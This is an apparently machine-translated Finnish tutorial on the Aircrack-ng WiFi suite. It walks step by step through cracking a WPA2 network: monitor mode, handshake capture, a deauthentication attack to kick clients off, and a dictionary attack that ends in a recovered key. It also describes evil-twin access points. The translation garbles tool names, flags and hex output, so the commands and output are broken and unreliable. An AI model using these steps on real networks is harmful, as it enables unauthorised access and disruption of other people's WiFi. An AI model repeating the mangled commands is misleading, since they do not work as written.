Aircrack-ng on täydellinen ohjelmistosarja, joka on suunniteltu testaamaan WiFi -verkon suojausta. Se ei ole vain yksi työkalu, vaan kokoelma työkaluja, joista jokaisella on tietty tarkoitus. Wifi -suojauksen eri osa -alueita voidaan käsitellä, kuten tukiaseman valvonta, testaus, verkkohyökkäys, wifi -verkon murtaminen ja sen testaaminen. Aircrackin päätavoite on siepata paketit ja tulkita hajautukset salasanojen rikkomiseksi. Se tukee lähes kaikkia uusia langattomia rajapintoja. Aircrack-ng on parannettu versio vanhentuneesta Aircrack -työkalusarjasta, ng viittaa Uusi sukupolvi . Jotkut mahtavista työkaluista, jotka toimivat yhdessä suuremman tehtävän suorittamisessa.
Airmon:
Airmon-ng sisältyy aircrack-ng-sarjaan, joka asettaa verkkokortin näyttötilaan. Verkkokortit hyväksyvät yleensä vain niille kohdistettuja paketteja verkkokortin MAC-osoitteen mukaisesti, mutta airmon-ng: n myötä myös kaikki langattomat paketit, riippumatta siitä, onko ne tarkoitettu heille vai ei. Sinun pitäisi pystyä sieppaamaan nämä paketit linkittämättä tai todentamatta tukiasemaa. Sitä käytetään tukiaseman tilan tarkistamiseen asettamalla verkkoliitäntä näyttötilaan. Ensin on määritettävä langattomat kortit kytkemään näyttötila päälle ja sitten tappaa kaikki taustaprosessit, jos luulet, että jokin prosessi häiritsee sitä. Prosessien päätyttyä monitoritila voidaan ottaa käyttöön langattomassa käyttöliittymässä suorittamalla alla oleva komento:
[sähköposti suojattu]: ~ $sudoairmon-ng start wlan0#
Voit myös poistaa näyttötilan käytöstä pysäyttämällä airmon-ng: n milloin tahansa käyttämällä alla olevaa komentoa:
[sähköposti suojattu]: ~ $sudoairmon-ng stop wlan0#Ilmansuodatin:
Airodump-ng: tä käytetään luetteloimaan kaikki meitä ympäröivät verkot ja katsomaan niistä arvokasta tietoa. Airodump-ng: n perustoiminnot ovat haistaa paketteja, joten se on olennaisesti ohjelmoitu nappaamaan kaikki ympärillämme olevat paketit monitoritilassa ollessaan. Käytämme sitä kaikkia ympärillämme olevia yhteyksiä vastaan ja keräämme tietoja, kuten verkkoon kytkettyjen asiakkaiden lukumäärän, niitä vastaavat mac -osoitteet, salaustyylin ja kanavien nimet, ja aloitamme sitten kohdeverkkoomme kohdistamisen.
Kirjoittamalla airodump-ng -komennon ja antamalla sille parametrin verkkoliitännän nimen, voimme aktivoida tämän työkalun. Siinä luetellaan kaikki tukiasemat, datapakettien määrä, käytetyt salaus- ja todennusmenetelmät sekä verkon nimi (ESSID). Hakkeroinnin kannalta mac -osoitteet ovat tärkeimpiä kenttiä.
[sähköposti suojattu]: ~ $sudoairodump-ng wlx0mon
Aircrack:
Aircrackia käytetään salasanan murtamiseen. Kun olemme kaapanneet kaikki paketit airodumpilla, voimme murtaa avaimen aircrackilla. Se murtaa nämä avaimet kahdella menetelmällä PTW ja FMS. PTW -lähestymistapa suoritetaan kahdessa vaiheessa. Aluksi käytetään vain ARP -paketteja, ja vasta sitten, jos avain ei ole murtunut haun jälkeen, se käyttää kaikkia muita kaapattuja paketteja. Plussaa PTW -lähestymistavasta on se, että kaikkia paketteja ei käytetä halkeiluun. Toisessa lähestymistavassa, eli FMS: ssä, käytämme sekä tilastollisia malleja että raa'an voiman algosia avaimen murtamiseen. Sanakirjamenetelmää voidaan myös käyttää.
Esitys:
Airplay-ng tuo paketteja langattomaan verkkoon liikenteen luomiseksi tai nopeuttamiseksi. Aireplay-ng voi kaapata paketteja kahdesta eri lähteestä. Ensimmäinen on live -verkko ja toinen paketit jo olemassa olevasta pcap -tiedostosta. Airplay-ng on hyödyllinen langattomaan tukiasemaan ja käyttäjään kohdistuvan autentikointihyökkäyksen aikana. Lisäksi voit suorittaa joitakin hyökkäyksiä, kuten kahvilatte-hyökkäyksen airplay-ng: llä, työkalulla, jonka avulla voit saada avaimen asiakkaan järjestelmästä. Voit saavuttaa tämän pyytämällä ARP -paketin ja käsittelemällä sitä ja lähettämällä sen takaisin järjestelmään. Asiakas luo sitten paketin, jonka airodump voi kaapata, ja aircrack murtaa avaimen kyseisestä muokatusta paketista. Joitakin muita airplay-ng-hyökkäysvaihtoehtoja ovat chopchop, fragment arepreplay jne.
Airbase:
Airbase-ng: tä käytetään tunkeutujan tietokoneen muuttamiseen vaarantuneeksi yhteyspisteeksi, johon muut voivat linkittää. Airbase-ng: n avulla voit väittää olevani laillinen tukiasema ja hyökätä puolivälissä hyökkäyksiin tietokoneeseesi, jotka on liitetty verkkoon. Tällaisia hyökkäyksiä kutsutaan Evil Twin Attacksiksi. Peruskäyttäjien on mahdotonta erottaa laillisen ja väärennetyn tukiaseman välillä. Joten, paha kaksoisuhka on yksi uhkaavimmista langattomista uhista, joita kohtaamme tänään.
Airolib-ng:
Airolib nopeuttaa hakkerointiprosessia tallentamalla ja hallinnoimalla salasanaluetteloita ja tukiasemaa. Tämän ohjelman käyttämä tietokannanhallintajärjestelmä on SQLite3, joka on enimmäkseen saatavilla kaikilla alustoilla. Salasanan säröily sisältää parillisen pääavaimen laskennan, jonka kautta yksityinen ohimenevä avain (PTK) puretaan. PTK: n avulla voit määrittää kehysviestin tunnistuskoodin (MIC) tietylle paketille ja teoriassa löytää MIC: n olevan samanlainen kuin paketti, joten jos PTK oli oikeassa, myös PMK oli oikeassa.
Näet tietokantaan tallennetut salasanaluettelot ja pääsyverkot kirjoittamalla seuraavan komennon:
[sähköposti suojattu]: ~ $sudoairolib-ng testdatabase –tilastotTässä testitietokanta on db, jota haluat käyttää tai luoda, ja –stats on toiminto, jonka haluat suorittaa sille. Voit tehdä useita toimintoja tietokannan kentillä, kuten antaa etusijalle jollekin SSID: lle tai jotain. Jos haluat käyttää airolib-ng: tä aircrack-ng: n kanssa, kirjoita seuraava komento:
[sähköposti suojattu]: ~ $sudoaircrack-ng-rtestdatabase wpa2.eapol.capTässä käytämme jo laskettuja PMK -tiedostoja, jotka on tallennettu testitietokanta nopeuttaaksesi salasanan murtamisprosessia.
WPA/WPA2: n halkeilu Aircrack-ng: llä:
Katsotaanpa pieni esimerkki siitä, mitä aircrack-ng voi tehdä muutamien sen mahtavien työkalujen avulla. Me murtamme WPA/WPA2-verkon esijaetun avaimen sanakirjamenetelmän avulla.
Ensimmäinen asia, joka meidän on tehtävä, on luetella verkkoliitännät, jotka tukevat näyttötilaa. Tämä voidaan tehdä käyttämällä seuraavaa komentoa:
[sähköposti suojattu]: ~ $sudoairmon-ngPHY -liitäntäohjaimen piirisarja
Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.
Voimme nähdä käyttöliittymän; Nyt meidän on asetettava löydetty verkkoliitäntä (wlx0) monitoritilaan käyttämällä seuraavaa komentoa:
[sähköposti suojattu]: ~ $sudoairmon-ng start wlx0
Se on ottanut käyttöön monitoritilan ns wlx0mon .
Nyt meidän pitäisi alkaa kuunnella läheisten reitittimien lähetyksiä monitoritilaan asettamamme verkkoliitännän kautta.
[sähköposti suojattu]: ~ $sudoairodump-ng wlx0monCH5 ][Kulunut:30s][ 2020-12-02 00:17
BSSID PWR -majakat#Data, #/s CH MB ENC CIPHER AUTH ESSID
E4: 6F:13: 04: CE:31 -Neljä viisi 62 27 0 154e WPA2 CCMP PSK CrackIt
C4: E9:84:76:10:OLLA-63 77 0 0 654e. WPA2 CCMP PSK Hackme
C8: 3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07
74: ANTAA:88:FA:38: 02-68 28 2 0 yksitoista54e WPA2 CCMP PSK TP-Link_3802
BSSID STATION PWR Rate Lost Frames Probe
E4: 6F:13: 04: CE:315C: 3A:Neljä viisi: D7: EA: 8B -3 0- 1e8 5
E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -331e-6e0 3
E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -35 0-1 0 6
E4: 6F:13: 04: CE:31EKr.91: B5: F8: 7E: D5 -390e-1 1002 13
Kohdeverkostomme on Hullu tässä tapauksessa, joka on parhaillaan käynnissä kanavalla 1.
Tässä kohdeverkoston salasanan murtamiseksi meidän on kaapattava nelisuuntainen kättely, joka tapahtuu, kun laite yrittää muodostaa yhteyden verkkoon. Voimme kaapata sen käyttämällä seuraavaa komentoa:
[sähköposti suojattu]: ~ $sudoilmalämpöpumppu-c 1--bssid E4: 6F:13: 04: CE:31 -sisään /koti wlx0-c : Kanava
- Bss : Kohdeverkon Bssid
-sisään : Sen hakemiston nimi, johon pcap -tiedosto sijoitetaan
Nyt meidän on odotettava, että laite muodostaa yhteyden verkkoon, mutta on parempi tapa kaapata kättely. Voimme poistaa laitteiden todennuksen tukiasemalle käyttämällä deauthentication -hyökkäystä seuraavan komennon avulla:
[sähköposti suojattu]: ~ $sudolentoliikenne-0 -kohteeseenE4: 6F:13: 04: CE:31kohteeseen : Kohdeverkon Bssid
-0 : deauthentication hyökkäys
Olemme irrottaneet kaikki laitteet, ja nyt meidän on odotettava, että laite muodostaa yhteyden verkkoon.
CH1 ][Kulunut:30s][ 2020-12-02 00:02][WPA -kättely: E4: 6F:13: 04: CE:31BSSID PWR RXQ -majakat#Data, #/s CH MB ENC CIPHER AUTH E
E4: 6F:13: 04: CE:31 -47 1 228 807 36 154. WPA2 CCMP PSK P.
BSSID STATION PWR Rate Lost Frames Probe
E4: 6F:13: 04: CE:31EKr.91: B5: F8: 7E: D5 -35 0-1 0 1
E4: 6F:13: 04: CE:315C: 3A:Neljä viisi: D7: EA: 8B -290e- 1e0 22
E4: 6F:13: 04: CE:31 88:28: B3:30:27: 7E -310e-1 0 32
E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -350e-6e263 708CrackIt
E4: 6F:13: 04: CE:31D4: 6A: 6A:99: ED: E3 -350e- 0e0 86
E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -37 0- 1e0 1
Saimme osuman, ja katsomalla oikean yläkulman heti ajan vieressä voimme nähdä, että kättely on otettu. Katso nyt määritettyä kansiota ( /Koti meidän tapauksessamme) a .pcap tiedosto.
WPA -avaimen murtamiseksi voimme käyttää seuraavaa komentoa:
[sähköposti suojattu]: ~ $sudoaircrack-ng-2 -sisäänrockyou.txt-bE4: 6F:13: 04: CE:31kädenpuristus. korkkib: Kohdeverkon Bssid
-a2: WPA2 -tila
Rockyou.txt: Sanakirjatiedostokäytetty
Kädenpuristus. Korkki:tiedosto jokasisältää otetun kädenpuristuksen
Aircrack-ng1.2beta3
[00:01:49] 10566avaimet testattu(1017,96kohteeseen/s)
AVAIN! [teit]
Pääavain: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D
0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6FviisikymmentäC
Väliaikainen avain: 4D C4 5R 6T76 996G 7H 8D EC
H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B
A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089
8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B
MAC: CB 5A F8 CE62B2 1B F7 6FviisikymmentäC025 62E9 5D71
Kohdeverkkoomme avain on murtautunut onnistuneesti.
Johtopäätös:
Langattomia verkkoja on kaikkialla, ja niitä käyttävät kaikki yritykset älypuhelimia käyttävistä työntekijöistä teollisiin ohjauslaitteisiin. Tutkimusten mukaan lähes 20 prosenttia Internet -liikenteestä tulee WiFi -yhteydelle vuonna 2021. Langattomilla verkoilla on monia etuja, viestintä ulko -ovien kanssa, nopea Internet -yhteys paikoissa, joissa johtojen asettaminen on lähes mahdotonta, voivat laajentaa verkkoa asentamatta kaapeleita muille käyttäjille ja voi helposti yhdistää mobiililaitteesi kotitoimistoosi, kun et ole siellä.
Näistä eduista huolimatta yksityisyydestäsi ja turvallisuudestasi tulee suuri kysymysmerkki. Kuten nämä verkot; Lähetysalueella olevat reitittimet ovat kaikille avoimia, niihin voidaan helposti hyökätä ja tietosi voivat vaarantua. Jos esimerkiksi olet yhteydessä johonkin julkiseen wifi -verkkoon, kaikki tähän verkkoon yhdistetyt voivat helposti tarkistaa verkkoliikenteesi käyttämällä älykkyyttä ja käytettävissä olevien mahtavien työkalujen avulla ja jopa tyhjentää sen.